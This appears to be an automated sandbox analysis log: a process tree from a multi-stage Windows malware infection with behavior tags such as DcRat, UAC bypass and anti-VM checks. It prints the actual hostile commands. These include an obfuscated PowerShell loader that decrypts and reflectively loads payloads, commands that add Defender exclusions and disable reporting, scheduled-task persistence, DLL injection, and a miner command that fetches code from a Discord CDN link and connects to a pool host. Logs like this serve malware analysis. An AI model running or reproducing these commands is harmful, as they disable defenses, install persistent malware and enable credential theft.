C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd';$RfUL='SplstIeistIetstIe'.Replace('stIe', ''),'TrfmgKafmgKnfmgKsfmgKfofmgKrfmgKmFfmgKinafmgKlBfmgKlofmgKckfmgK'.Replace('fmgK', ''),'DecHsSjomHsSjpHsSjrHsSjessHsSj'.Replace('HsSj', ''),'EleBZnKmBZnKeBZnKntBZnKAtBZnK'.Replace('BZnK', ''),'ReGrwradGrwrLiGrwrnGrwreGrwrsGrwr'.Replace('Grwr', ''),'CIOLbopIOLbyIOLbTIOLboIOLb'.Replace('IOLb', ''),'FrpwLNompwLNBapwLNspwLNepwLN6pwLN4SpwLNtpwLNripwLNnpwLNgpwLN'.Replace('pwLN', ''),'LZaAAoZaAAaZaAAdZaAA'.Replace('ZaAA', ''),'IswsYnswsYvokswsYeswsY'.Replace('swsY', ''),'MayHpwinyHpwMoyHpwduyHpwleyHpw'.Replace('yHpw', ''),'EnfcpnnfcptrynfcpPnfcponfcpinnfcptnfcp'.Replace('nfcp', ''),'GKVjZetCKVjZurKVjZrKVjZenKVjZtPrKVjZocKVjZessKVjZ'.Replace('KVjZ', ''),'CmmRYhanmmRYgmmRYeExmmRYtenmmRYsmmRYimmRYonmmRY'.Replace('mmRY', ''),'CrewBkzatwBkzeDwBkzecwBkzrywBkzptwBkzowBkzrwBkz'.Replace('wBkz', '');powershell -w hidden;function HYZRs($YjbML){$FKFbd=[System.Security.Cryptography.Aes]::Create();$FKFbd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$FKFbd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$FKFbd.Key=[System.Convert]::($RfUL[6])('2M0fT7QfMAGeiJeE2Y8HU5skhkMH0OcAFA0SFzRHVws=');$FKFbd.IV=[System.Convert]::($RfUL[6])('Wv0CCTjoJ02lflet8TKTGg==');$qvWHS=$FKFbd.($RfUL[13])();$UQnTy=$qvWHS.($RfUL[1])($YjbML,0,$YjbML.Length);$qvWHS.Dispose();$FKFbd.Dispose();$UQnTy;}function tsjtk($YjbML){$KLabx=New-Object System.IO.MemoryStream(,$YjbML);$CeqVN=New-Object System.IO.MemoryStream;$OFOrH=New-Object System.IO.Compression.GZipStream($KLabx,[IO.Compression.CompressionMode]::($RfUL[2]));$OFOrH.($RfUL[5])($CeqVN);$OFOrH.Dispose();$KLabx.Dispose();$CeqVN.Dispose();$CeqVN.ToArray();}$xZSiw=[System.IO.File]::($RfUL[4])([Console]::Title);$VwJSg=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 5).Substring(2))));$NGyKN=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 6).Substring(2))));[System.Reflection.Assembly]::($RfUL[7])([byte[]]$NGyKN).($RfUL[10]).($RfUL[8])($null,$null);[System.Reflection.Assembly]::($RfUL[7])([byte[]]$VwJSg).($RfUL[10]).($RfUL[8])($null,$null); "7⤵PID:1464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵PID:528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵PID:1872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')8⤵PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\tnydzrrq.mxi.exe"C:\Users\Admin\AppData\Local\Temp\tnydzrrq.mxi.exe"8⤵
- Executes dropped EXE
PID:448
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe5⤵
- Executes dropped EXE
PID:940
-
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe5⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exeC:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe4⤵
- Executes dropped EXE
PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"3⤵
- Executes dropped EXE
PID:5000
-
-
C:\Users\Admin\AppData\Local\Temp\Files\0j4.exe"C:\Users\Admin\AppData\Local\Temp\Files\0j4.exe"3⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\Files\0j4.exeC:\Users\Admin\AppData\Local\Temp\Files\0j4.exe4⤵
- Executes dropped EXE
PID:4304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"3⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3256
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1476 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:4012 -
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /im chrome.exe /f5⤵
- Kills process with taskkill
PID:4524
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:1056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3508
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe" -Force4⤵PID:5108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:2380 -
C:\Users\Admin\Pictures\aTRkSzKI5BC7TPjmCAGIPWNw.exe"C:\Users\Admin\Pictures\aTRkSzKI5BC7TPjmCAGIPWNw.exe"5⤵
- Executes dropped EXE
PID:3880
-
-
C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"5⤵PID:3476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5016
-
-
C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"6⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5772
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1432
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:808
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4008
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1508
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:8
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:384
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5492
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵PID:220
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:4584
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵PID:5336
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:5320
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:5892
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:808⤵PID:2480
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Modifies data under HKEY_USERS
PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\3893dd77f0ce80920420c4e5d9e1888e.exeC:\Users\Admin\AppData\Local\Temp\csrss\3893dd77f0ce80920420c4e5d9e1888e.exe8⤵PID:3180
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe8⤵PID:3608
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:5688
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:60
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:2896
-
-
-
-
-
C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"5⤵
- Executes dropped EXE
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2596
-
-
C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"6⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3648
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5840
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:5492
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:540
-
-
-
-
C:\Users\Admin\Pictures\H8Vxc3qhrAdW6f9d48nBRkdV.exe"C:\Users\Admin\Pictures\H8Vxc3qhrAdW6f9d48nBRkdV.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe6⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetWindowsHookEx
PID:3116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "7⤵PID:5108
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:5852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F8⤵
- DcRat
- Creates scheduled task(s)
PID:5360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsg3880.tmpC:\Users\Admin\AppData\Local\Temp\nsg3880.tmp6⤵PID:2776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 11047⤵
- Program crash
PID:5464
-
-
-
-
C:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exe"C:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==5⤵
- Executes dropped EXE
PID:872 -
C:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exeC:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exe PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA== failrestart6⤵PID:4204
-
-
-
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe"C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe" --silent --allusers=05⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Enumerates connected drives
- Maps connected drives based on registry
- Modifies system certificate store
PID:1292 -
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exeC:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x69ee9530,0x69ee953c,0x69ee95486⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:2340
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qhD0Fjd2sS2bPUQL1AQPs2sm.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qhD0Fjd2sS2bPUQL1AQPs2sm.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:736
-
-
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe"C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1292 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240116154911" --session-guid=56fd4209-d392-4095-9ad0-39a348e34dfc --server-tracking-blob=NmFkMWQ5NDEwNDIxYzcxOTBlZWFkZjFiZTM1YTkwMDU2OWNjZWE0OTYwMWM2YWFhMTRiYzZiOWE1NjJkMGYwMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTQyMDE0NC4wMDk0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3ZTMyNzMxNy03YzFjLTRiNGYtYjg5My0wOTY2ZTg0MjUyOTYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=68050000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5576 -
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exeC:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x692b9530,0x692b953c,0x692b95487⤵
- Looks for VMWare services registry key.
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:5656
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"6⤵PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x502614,0x502620,0x50262c7⤵
- Looks for VMWare services registry key.
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:5356
-
-
-
-
C:\Users\Admin\Pictures\whHieXPyyb8wmmyMSG6CBi5j.exe"C:\Users\Admin\Pictures\whHieXPyyb8wmmyMSG6CBi5j.exe"5⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\7zS480E.tmp\Install.exe.\Install.exe6⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD7.tmp\Install.exe.\Install.exe /klhTMdidYdHl "385118" /S7⤵
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:5380 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵PID:5996
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵PID:5304
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵PID:5352
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵PID:5368
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵PID:6016
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵PID:5300
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵PID:6072
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵PID:5408
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqBxNDcCI" /SC once /ST 00:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Blocklisted process makes network request
- Executes dropped EXE
- Checks processor information in registry
- Creates scheduled task(s)
PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqBxNDcCI"8⤵PID:888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqBxNDcCI"8⤵PID:5820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 15:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\BbAXLjX.exe\" Ik /AZsite_idLOu 385118 /S" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4376
-
-
-
-
-
C:\Users\Admin\Pictures\cxcfHffNmhPEQy61bLBMgSz0.exe"C:\Users\Admin\Pictures\cxcfHffNmhPEQy61bLBMgSz0.exe"5⤵
- Loads dropped DLL
- Registers COM server for autorun
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:6032
-
-
C:\Users\Admin\Pictures\iCWH3B9J8lpTZ8jeQ23ry2W7.exe"C:\Users\Admin\Pictures\iCWH3B9J8lpTZ8jeQ23ry2W7.exe"5⤵PID:5216
-
-
C:\Users\Admin\Pictures\gQMKFKOnGqgf3wRskOTOOpYZ.exe"C:\Users\Admin\Pictures\gQMKFKOnGqgf3wRskOTOOpYZ.exe"5⤵PID:4744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 2846⤵
- Program crash
PID:5132
-
-
-
C:\Users\Admin\Pictures\w80gJBsJ5XsqWMYTh0o5CW3t.exe"C:\Users\Admin\Pictures\w80gJBsJ5XsqWMYTh0o5CW3t.exe"5⤵PID:4948
-
-
C:\Users\Admin\Pictures\ouzvpVKT6CtdrRiK38JNhRY8.exe"C:\Users\Admin\Pictures\ouzvpVKT6CtdrRiK38JNhRY8.exe"5⤵PID:1836
-
-
